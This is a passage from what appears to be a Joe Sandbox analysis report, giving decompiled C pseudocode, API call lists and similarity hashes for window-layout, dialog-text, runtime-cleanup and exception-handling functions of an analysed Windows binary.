                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction ID: 06d3a27e9a71f61af07d947a22166c4eb594c98390c8c90c9b059b12e6351926
                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                    • Instruction Fuzzy Hash: D1312AB1A1474A8FCB18DF28C85126EBBE0FB95304F50452EE5D5C7781C734EA0ACB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00CCE2E8(struct HWND__* __ecx, void* __edx, void* __eflags, intOrPtr _a8) {
                                                    				char _v0;
                                                    				struct HWND__* _v8;
                                                    				short _v2048;
                                                    				char _v2208;
                                                    				char _v2288;
                                                    				signed int _v2292;
                                                    				char _v2300;
                                                    				intOrPtr _v2304;
                                                    				struct tagRECT _v2320;
                                                    				intOrPtr _v2324;
                                                    				intOrPtr _v2336;
                                                    				struct tagRECT _v2352;
                                                    				struct tagRECT _v2368;
                                                    				signed int _v2376;
                                                    				char _v2377;
                                                    				intOrPtr _v2384;
                                                    				intOrPtr _v2393;
                                                    				void* __ebx;
                                                    				void* __esi;
                                                    				signed int _t95;
                                                    				struct HWND__* _t106;
                                                    				signed int _t119;
                                                    				signed int _t134;
                                                    				signed int _t145;
                                                    				void* _t150;
                                                    				void* _t155;
                                                    				char _t156;
                                                    				void* _t157;
                                                    				signed int _t158;
                                                    				intOrPtr _t160;
                                                    				void* _t163;
                                                    				void* _t169;
                                                    				long _t170;
                                                    				signed int _t174;
                                                    				void* _t178;
                                                    				signed int _t179;
                                                    				signed int _t186;
                                                    				struct HWND__* _t187;
                                                    				struct HWND__* _t188;
                                                    				void* _t189;
                                                    				void* _t192;
                                                    				signed int _t193;
                                                    				long _t194;
                                                    				void* _t201;
                                                    				int* _t202;
                                                    				struct HWND__* _t203;
                                                    				void* _t205;
                                                    				void* _t206;
                                                    				void* _t208;
                                                    				void* _t210;
                                                    				void* _t214;
                                                    				signed int _t221;
                                                    
                                                    				_t178 = __edx;
                                                    				_t203 = __ecx;
                                                    				_v2368.bottom = __ecx;
                                                    				E00CC4092( &_v2208, 0x50, L"$%s:", _a8);
                                                    				_t208 =  &_v2368 + 0x10;
                                                    				E00CD1DA7( &_v2208,  &_v2288, 0x50);
                                                    				_t95 = E00CE3E90( &_v2300);
                                                    				_t187 = _v8;
                                                    				_t155 = 0;
                                                    				_v2376 = _t95;
                                                    				_t210 =  *0xcfe720 - _t155; // 0x64
                                                    				if(_t210 <= 0) {
                                                    					L8:
                                                    					_t156 = E00CCD81C(_t155, _t203, _t178, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
                                                    					_v2377 = _t156;
                                                    					GetWindowRect(_t187,  &_v2352);
                                                    					GetClientRect(_t187,  &(_v2320.top));
                                                    					_t169 = _v2352.right - _v2352.left + 1;
                                                    					_t179 = _v2320.bottom;
                                                    					_t192 = _v2352.bottom - _v2352.top + 1;
                                                    					_v2368.right = 0x64;
                                                    					_t205 = _t192 - _v2304;
                                                    					_v2368.bottom = _t169 - _t179;
                                                    					if(_v0 == 0) {
                                                    						if(_t156 != 0) {
                                                    							_t158 = 0x64;
                                                    							asm("cdq");
                                                    							_t134 = _v2292 * _v2368.top;
                                                    							_t160 = _t179 * _v2368.right / _t158 + _v2352.right;
                                                    							_v2324 = _t160;
                                                    							asm("cdq");
                                                    							_t186 = _t134 % _v2352.top;
                                                    							_v2352.left = _t134 / _v2352.top + _t205;
                                                    							asm("cdq");
                                                    							asm("cdq");
                                                    							_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
                                                    							_t163 = (_t169 - _t160 - _t186 >> 1) + _v2352.bottom;
                                                    							if(_t163 < 0) {
                                                    								_t163 = 0;
                                                    							}
                                                    							if(_t201 < 0) {
                                                    								_t201 = 0;
                                                    							}
                                                    							_t145 =  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204;
                                                    							_t221 = _t145;
                                                    							 *0xd23150(_t187, 0, _t163, _t201, _v2324, _v2352.left, _t145);
                                                    							GetWindowRect(_t187,  &_v2368);
                                                    							_t156 = _v2393;
                                                    						}
                                                    						if(E00CCD89C(_t156, _v2368.bottom, _t221, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
                                                    							SetWindowTextW(_t187,  &_v2048);
                                                    						}
                                                    					}
                                                    					_t206 = _t205 - GetSystemMetrics(8);
                                                    					_t106 = GetWindow(_t187, 5);
                                                    					_t188 = _t106;
                                                    					_v2368.bottom = _t188;
                                                    					if(_t156 == 0) {
                                                    						L23:
                                                    						return _t106;
                                                    					} else {
                                                    						_t157 = 0;
                                                    						while(_t188 != 0) {
                                                    							__eflags = _t157 - 0x200;
                                                    							if(_t157 >= 0x200) {
                                                    								goto L23;
                                                    							}
                                                    							GetWindowRect(_t188,  &_v2320);
                                                    							_t170 = _v2320.top.left;
                                                    							_t193 = 0x64;
                                                    							asm("cdq");
                                                    							_t194 = _v2320.left;
                                                    							asm("cdq");
                                                    							_t119 = (_t170 - _t206 - _v2336) * _v2368.top;
                                                    							asm("cdq");
                                                    							_t174 = 0x64;
                                                    							asm("cdq");
                                                    							asm("cdq");
                                                    							 *0xd23150(_t188, 0, (_t194 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t193, 0x204);
                                                    							_t106 = GetWindow(_t188, 2);
                                                    							_t188 = _t106;
                                                    							__eflags = _t188 - _v2384;
                                                    							if(_t188 == _v2384) {
                                                    								goto L23;
                                                    							}
                                                    							_t157 = _t157 + 1;
                                                    							__eflags = _t157;
                                                    						}
                                                    						goto L23;
                                                    					}
                                                    				} else {
                                                    					_t202 = 0xcfe274;
                                                    					do {
                                                    						if( *_t202 > 0) {
                                                    							_t9 =  &(_t202[1]); // 0xcf4788
                                                    							_t150 = E00CE6740( &_v2288,  *_t9, _t95);
                                                    							_t208 = _t208 + 0xc;
                                                    							if(_t150 == 0) {
                                                    								_t12 =  &(_t202[1]); // 0xcf4788
                                                    								if(E00CCD9F0(_t155, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
                                                    									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
                                                    								}
                                                    							}
                                                    							_t95 = _v2368.top;
                                                    						}
                                                    						_t155 = _t155 + 1;
                                                    						_t202 =  &(_t202[3]);
                                                    						_t214 = _t155 -  *0xcfe720; // 0x64
                                                    					} while (_t214 < 0);
                                                    					goto L8;
                                                    				}
                                                    			}


                                                    APIs
                                                    • _swprintf.LIBCMT ref: 00CCE30E
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CD1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00D01030,?,00CCD928,00000000,?,00000050,00D01030), ref: 00CD1DC4
                                                    • _strlen.LIBCMT ref: 00CCE32F
                                                    • SetDlgItemTextW.USER32(?,00CFE274,?), ref: 00CCE38F
                                                    • GetWindowRect.USER32(?,?), ref: 00CCE3C9
                                                    • GetClientRect.USER32(?,?), ref: 00CCE3D5
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00CCE475
                                                    • GetWindowRect.USER32(?,?), ref: 00CCE4A2
                                                    • SetWindowTextW.USER32(?,?), ref: 00CCE4DB
                                                    • GetSystemMetrics.USER32(00000008), ref: 00CCE4E3
                                                    • GetWindow.USER32(?,00000005), ref: 00CCE4EE
                                                    • GetWindowRect.USER32(00000000,?), ref: 00CCE51B
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CCE58D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                    • String ID: $%s:$CAPTION$d
                                                    • API String ID: 2407758923-2512411981
                                                    • Opcode ID: 609b74235080e9fd26f2ccf9ee0051e0ead25b3a8f1c627518432a11925528a5
                                                    • Instruction ID: 9f7dab9751ea383abf3d05121b62f6a968034305acb4cc82fa74c4e29333c29e
                                                    • Opcode Fuzzy Hash: 609b74235080e9fd26f2ccf9ee0051e0ead25b3a8f1c627518432a11925528a5
                                                    • Instruction Fuzzy Hash: 54819272208341AFD711DFA8CD89F6FBBE9EB89704F04092DFA95D7250D634E9058B62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CECB22(intOrPtr _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _t25;
                                                    				intOrPtr* _t26;
                                                    				intOrPtr _t28;
                                                    				intOrPtr* _t29;
                                                    				intOrPtr* _t31;
                                                    				intOrPtr* _t45;
                                                    				intOrPtr* _t46;
                                                    				intOrPtr* _t47;
                                                    				intOrPtr* _t55;
                                                    				intOrPtr* _t70;
                                                    				intOrPtr _t74;
                                                    
                                                    				_t74 = _a4;
                                                    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                    				if(_t25 != 0 && _t25 != 0xcfeea0) {
                                                    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                    					if(_t45 != 0 &&  *_t45 == 0) {
                                                    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                    						if(_t46 != 0 &&  *_t46 == 0) {
                                                    							E00CE8DCC(_t46);
                                                    							E00CEC701( *((intOrPtr*)(_t74 + 0x88)));
                                                    						}
                                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                                    							E00CE8DCC(_t47);
                                                    							E00CEC7FF( *((intOrPtr*)(_t74 + 0x88)));
                                                    						}
                                                    						E00CE8DCC( *((intOrPtr*)(_t74 + 0x7c)));
                                                    						E00CE8DCC( *((intOrPtr*)(_t74 + 0x88)));
                                                    					}
                                                    				}
                                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                                    					E00CE8DCC( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                    					E00CE8DCC( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                    					E00CE8DCC( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                    					E00CE8DCC( *((intOrPtr*)(_t74 + 0x8c)));
                                                    				}
                                                    				E00CECC95( *((intOrPtr*)(_t74 + 0x9c)));
                                                    				_t28 = 6;
                                                    				_t55 = _t74 + 0xa0;
                                                    				_v8 = _t28;
                                                    				_t70 = _t74 + 0x28;
                                                    				do {
                                                    					if( *((intOrPtr*)(_t70 - 8)) != 0xcfe968) {
                                                    						_t31 =  *_t70;
                                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                                    							E00CE8DCC(_t31);
                                                    							E00CE8DCC( *_t55);
                                                    						}
                                                    						_t28 = _v8;
                                                    					}
                                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                                    							E00CE8DCC(_t29);
                                                    						}
                                                    						_t28 = _v8;
                                                    					}
                                                    					_t55 = _t55 + 4;
                                                    					_t70 = _t70 + 0x10;
                                                    					_t28 = _t28 - 1;
                                                    					_v8 = _t28;
                                                    				} while (_t28 != 0);
                                                    				return E00CE8DCC(_t74);
                                                    			}

                                                    APIs
                                                    • ___free_lconv_mon.LIBCMT ref: 00CECB66
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC71E
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC730
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC742
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC754
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC766
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC778
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC78A
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC79C
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7AE
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7C0
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7D2
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7E4
                                                      • Part of subcall function 00CEC701: _free.LIBCMT ref: 00CEC7F6
                                                    • _free.LIBCMT ref: 00CECB5B
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CECB7D
                                                    • _free.LIBCMT ref: 00CECB92
                                                    • _free.LIBCMT ref: 00CECB9D
                                                    • _free.LIBCMT ref: 00CECBBF
                                                    • _free.LIBCMT ref: 00CECBD2
                                                    • _free.LIBCMT ref: 00CECBE0
                                                    • _free.LIBCMT ref: 00CECBEB
                                                    • _free.LIBCMT ref: 00CECC23
                                                    • _free.LIBCMT ref: 00CECC2A
                                                    • _free.LIBCMT ref: 00CECC47
                                                    • _free.LIBCMT ref: 00CECC5F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                    • String ID:
                                                    • API String ID: 161543041-0
                                                    • Opcode ID: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                    • Instruction ID: 07c35552de85e267b00680d9384c084dd3edcffb51d1eb35a4b8eaf94932f35c
                                                    • Opcode Fuzzy Hash: 8421841d45942cd3fd3fa13244151abf3cc91656ae64275534d8b99e54d5bc44
                                                    • Instruction Fuzzy Hash: 47315C316003869FEB20AA3ADC86B5A77E9BF10310F245429F56CD7192DF35EE45DB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDD69E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
                                                    				void _v0;
                                                    				intOrPtr _v4;
                                                    				intOrPtr _v12;
                                                    				struct HWND__* _t9;
                                                    				void* _t19;
                                                    				void* _t26;
                                                    				void* _t28;
                                                    				void* _t30;
                                                    				struct HWND__* _t33;
                                                    				struct HWND__* _t36;
                                                    				void* _t40;
                                                    				void* _t49;
                                                    
                                                    				_t49 = __fp0;
                                                    				_t40 = __eflags;
                                                    				_t28 = __edx;
                                                    				E00CDEC50(0x1018);
                                                    				_t9 = E00CDA5C6(_t40);
                                                    				if(_t9 == 0) {
                                                    					L12:
                                                    					return _t9;
                                                    				}
                                                    				_t9 = GetWindow(_a4124, 5);
                                                    				_t33 = _t9;
                                                    				_t30 = 0;
                                                    				_t36 = _t33;
                                                    				if(_t33 == 0) {
                                                    					L11:
                                                    					goto L12;
                                                    				}
                                                    				while(_t30 < 0x200) {
                                                    					GetClassNameW(_t33,  &_a24, 0x800);
                                                    					if(E00CD1FBB( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t33, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                    						_t26 = SendMessageW(_t33, 0x173, 0, 0);
                                                    						if(_t26 != 0) {
                                                    							GetObjectW(_t26, 0x18,  &_v0);
                                                    							_t19 = E00CDA605(_v4);
                                                    							SendMessageW(_t33, 0x172, 0, E00CDA80C(_t28, _t49, _t26, E00CDA5E4(_v12), _t19));
                                                    							DeleteObject(_t26);
                                                    						}
                                                    					}
                                                    					_t9 = GetWindow(_t33, 2);
                                                    					_t33 = _t9;
                                                    					if(_t33 != _t36) {
                                                    						_t30 = _t30 + 1;
                                                    						if(_t33 != 0) {
                                                    							continue;
                                                    						}
                                                    					}
                                                    					break;
                                                    				}
                                                    				goto L11;
                                                    			}

                                                    APIs
                                                    • GetWindow.USER32(?,00000005), ref: 00CDD6C1
                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00CDD6ED
                                                      • Part of subcall function 00CD1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00CCC116,00000000,.exe,?,?,00000800,?,?,?,00CD8E3C), ref: 00CD1FD1
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CDD709
                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CDD720
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CDD734
                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CDD75D
                                                    • DeleteObject.GDI32(00000000), ref: 00CDD764
                                                    • GetWindow.USER32(00000000,00000002), ref: 00CDD76D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                    • String ID: STATIC
                                                    • API String ID: 3820355801-1882779555
                                                    • Opcode ID: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                    • Instruction ID: f02a7983ed587fc2f8e2530f4c0f015479fb2ae6304f3ea1248e0c0fd75f7476
                                                    • Opcode Fuzzy Hash: e8a3ee29a8e45c6855a2a507dd9afcf1948afcd99381cac99d1c740920cde545
                                                    • Instruction Fuzzy Hash: EF1136729007107BE2316B709C4AFAF765CAF50701F014122FB22E23D5DA68CB4652B5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CE96F1(char _a4) {
                                                    				char _v8;
                                                    
                                                    				_t26 = _a4;
                                                    				_t52 =  *_a4;
                                                    				if( *_a4 != 0xcf6430) {
                                                    					E00CE8DCC(_t52);
                                                    					_t26 = _a4;
                                                    				}
                                                    				E00CE8DCC( *((intOrPtr*)(_t26 + 0x3c)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x30)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x34)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x38)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x28)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x2c)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x40)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x44)));
                                                    				E00CE8DCC( *((intOrPtr*)(_a4 + 0x360)));
                                                    				_v8 =  &_a4;
                                                    				E00CE95A9(5,  &_v8);
                                                    				_v8 =  &_a4;
                                                    				return E00CE95F9(4,  &_v8);
                                                    			}

                                                    APIs
                                                    • _free.LIBCMT ref: 00CE9705
                                                      • Part of subcall function 00CE8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?), ref: 00CE8DE2
                                                      • Part of subcall function 00CE8DCC: GetLastError.KERNEL32(?,?,00CEC896,?,00000000,?,00000000,?,00CEC8BD,?,00000007,?,?,00CECCBA,?,?), ref: 00CE8DF4
                                                    • _free.LIBCMT ref: 00CE9711
                                                    • _free.LIBCMT ref: 00CE971C
                                                    • _free.LIBCMT ref: 00CE9727
                                                    • _free.LIBCMT ref: 00CE9732
                                                    • _free.LIBCMT ref: 00CE973D
                                                    • _free.LIBCMT ref: 00CE9748
                                                    • _free.LIBCMT ref: 00CE9753
                                                    • _free.LIBCMT ref: 00CE975E
                                                    • _free.LIBCMT ref: 00CE976C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                    • Instruction ID: 97e97c6c3d0971b6da03d38c8d2b9ca87f69917969da4952af207fad62715136
                                                    • Opcode Fuzzy Hash: 2bbd228600dfcb42a189b381569f24a39f7efd25d74fd80bb0d924f88bcbabea
                                                    • Instruction Fuzzy Hash: F411A27611014AAFCB01EF96CC82CD93BB5EF14350B5555A1FA088F262DE32EB54AB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00CE2E31(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                    				signed char* _v0;
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				signed int _v40;
                                                    				signed int _v44;
                                                    				intOrPtr _v48;
                                                    				signed int _v52;
                                                    				intOrPtr _v56;
                                                    				intOrPtr _v60;
                                                    				void _v64;
                                                    				signed int _v68;
                                                    				char _v84;
                                                    				intOrPtr _v88;
                                                    				signed int _v92;
                                                    				intOrPtr _v100;
                                                    				void _v104;
                                                    				intOrPtr* _v112;
                                                    				signed char* _v184;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				void* _t201;
                                                    				signed int _t202;
                                                    				char _t203;
                                                    				signed int _t205;
                                                    				signed int _t207;
                                                    				signed char* _t208;
                                                    				signed int _t209;
                                                    				signed int _t210;
                                                    				signed int _t214;
                                                    				void* _t217;
                                                    				signed char* _t220;
                                                    				void* _t222;
                                                    				void* _t224;
                                                    				signed char _t228;
                                                    				signed int _t229;
                                                    				void* _t231;
                                                    				void* _t234;
                                                    				void* _t237;
                                                    				signed int _t247;
                                                    				void* _t250;
                                                    				intOrPtr* _t251;
                                                    				signed int _t252;
                                                    				intOrPtr _t253;
                                                    				signed int _t254;
                                                    				void* _t259;
                                                    				void* _t261;
                                                    				void* _t264;
                                                    				void* _t265;
                                                    				signed int _t269;
                                                    				signed char* _t270;
                                                    				intOrPtr* _t271;
                                                    				signed char _t272;
                                                    				signed int _t273;
                                                    				signed int _t274;
                                                    				intOrPtr* _t276;
                                                    				signed int _t277;
                                                    				signed int _t278;
                                                    				signed int _t283;
                                                    				signed int _t290;
                                                    				signed int _t291;
                                                    				signed int _t294;
                                                    				signed int _t296;
                                                    				signed char* _t297;
                                                    				signed int _t298;
                                                    				signed char _t299;
                                                    				signed int* _t301;
                                                    				signed char* _t304;
                                                    				signed int _t314;
                                                    				signed int _t315;
                                                    				signed int _t317;
                                                    				signed int _t327;
                                                    				void* _t329;
                                                    				void* _t331;
                                                    				void* _t332;
                                                    				void* _t333;
                                                    				void* _t334;
                                                    
                                                    				_t296 = __edx;
                                                    				_push(_t315);
                                                    				_t301 = _a20;
                                                    				_v20 = 0;
                                                    				_v28 = 0;
                                                    				_t275 = E00CE3DAA(_a8, _a16, _t301);
                                                    				_t332 = _t331 + 0xc;
                                                    				_v12 = _t275;
                                                    				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                    					L67:
                                                    					_t201 = E00CE8D24(_t270, _t296, _t301, _t315);
                                                    					asm("int3");
                                                    					_t329 = _t332;
                                                    					_t333 = _t332 - 0x38;
                                                    					_push(_t270);
                                                    					_t271 = _v112;
                                                    					__eflags =  *_t271 - 0x80000003;
                                                    					if(__eflags == 0) {
                                                    						return _t201;
                                                    					} else {
                                                    						_push(_t315);
                                                    						_push(_t301);
                                                    						_t202 = E00CE2AEC(_t271, _t275, _t296, _t301, _t315, __eflags);
                                                    						__eflags =  *(_t202 + 8);
                                                    						if(__eflags != 0) {
                                                    							__imp__EncodePointer(0);
                                                    							_t315 = _t202;
                                                    							_t222 = E00CE2AEC(_t271, _t275, _t296, 0, _t315, __eflags);
                                                    							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                    							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                    								__eflags =  *_t271 - 0xe0434f4d;
                                                    								if( *_t271 != 0xe0434f4d) {
                                                    									__eflags =  *_t271 - 0xe0434352;
                                                    									if( *_t271 != 0xe0434352) {
                                                    										_t214 = E00CE0961(_t296, 0, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                    										_t333 = _t333 + 0x1c;
                                                    										__eflags = _t214;
                                                    										if(_t214 != 0) {
                                                    											L84:
                                                    											return _t214;
                                                    										}
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    						_t203 = _a16;
                                                    						_v28 = _t203;
                                                    						_v24 = 0;
                                                    						__eflags =  *(_t203 + 0xc);
                                                    						if( *(_t203 + 0xc) > 0) {
                                                    							_push(_a24);
                                                    							E00CE0894(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                    							_t298 = _v40;
                                                    							_t334 = _t333 + 0x18;
                                                    							_t214 = _v44;
                                                    							_v20 = _t214;
                                                    							_v12 = _t298;
                                                    							__eflags = _t298 - _v32;
                                                    							if(_t298 >= _v32) {
                                                    								goto L84;
                                                    							}
                                                    							_t277 = _t298 * 0x14;
                                                    							__eflags = _t277;
                                                    							_v16 = _t277;
                                                    							do {
                                                    								_t278 = 5;
                                                    								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                                                    								_t334 = _t334 + 0xc;
                                                    								__eflags = _v64 - _t217;
                                                    								if(_v64 > _t217) {
                                                    									goto L83;
                                                    								}
                                                    								__eflags = _t217 - _v60;
                                                    								if(_t217 > _v60) {
